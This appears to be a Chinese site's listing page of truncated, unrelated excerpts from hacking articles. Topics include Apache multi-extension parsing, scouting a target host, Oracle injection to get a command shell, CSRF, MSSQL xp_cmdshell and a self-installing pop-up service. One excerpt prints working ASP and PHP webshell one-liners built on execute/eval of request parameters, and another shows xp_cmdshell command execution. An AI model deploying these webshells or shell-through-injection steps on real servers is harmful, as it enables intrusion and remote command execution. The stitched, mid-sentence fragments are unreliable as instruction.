操作系统

主要问题是：不管文件最后后缀为什么，只要是.php.*结尾，就会被Apache服务器解析成php文件，问题是apache如果在mime.types文件里面没有定义的扩展名在诸如x1.x2.x3的情况下，最后一个x3的没有定义，他会给解析成倒数第二个的x...

今天的内容是获得主机的信息。 我们要黑一台主机，首先要了解它的信息，　　包括它的类型，用户列表，目录，端口，漏洞等等。　　首先我们我们要找一台主机来练手，随便挑吧！www.dddd.com(乱说的)第一部，呵呵，　　先在ie里看看吧，mmmm̷...

用Google浏览器浏览此篇文章，并点击下面的字符： 　　EVIL:% 　　是不是很爽，^_^。

正则表达式的基本语法 　　首先让我们看两个特殊的符号\’^\’和\’$\’。他们的作用是分别指出一个字符串的开始和结束。例子如下： 　　 　　"^The"：表示所有以"The...

犀利的 oracle 注入技术 　　原文发表在黑客手册 　　linx 2008.1.12 　　介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。 　　以下的演示都是在web上的sql plus执行的，在web注入时 把selec...

asp一句话 <%execute(request("1"))%> php一句话 <?php eval($_POST[1]);?> aspx一句话 <script language="C#&qu...

0x01 什么是CSRF攻击 CSRF是Cross Site Request Forgery的缩写（也缩写为XSRF），直译过来就是跨站请求伪造的意思，也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做，你可以把...

测试环境：windows xp pro sp2 + mssql 2005（服务以system权限启动） 　　一．xp_cmdshell 　　EXEC master..xp_cmdshell ‘ipconfig’ 　　开启xp_c...

ps:请勿用于非法用途，仅供技术研究之用。 by：yunshu 这个东西的主要功能就是去网上一个URL读取配置文件，拿到需要弹出的窗口以及周期时间，然后开始弹……程序安装成服务，并设置为自动启动。启动之后写入一段代码到exp...

【赛迪网-IT技术报道】U盘 如今可以说非常普及了，不过，如果只是把它用来存储数据的话，也许有点可惜了。其实，我们还可以让U盘发挥更大的能量！今天小编教你一招，能让你的U盘代 替登录系统的密码，只有当你插上U盘才能正常进入系统操作，否则任何操作都无法进...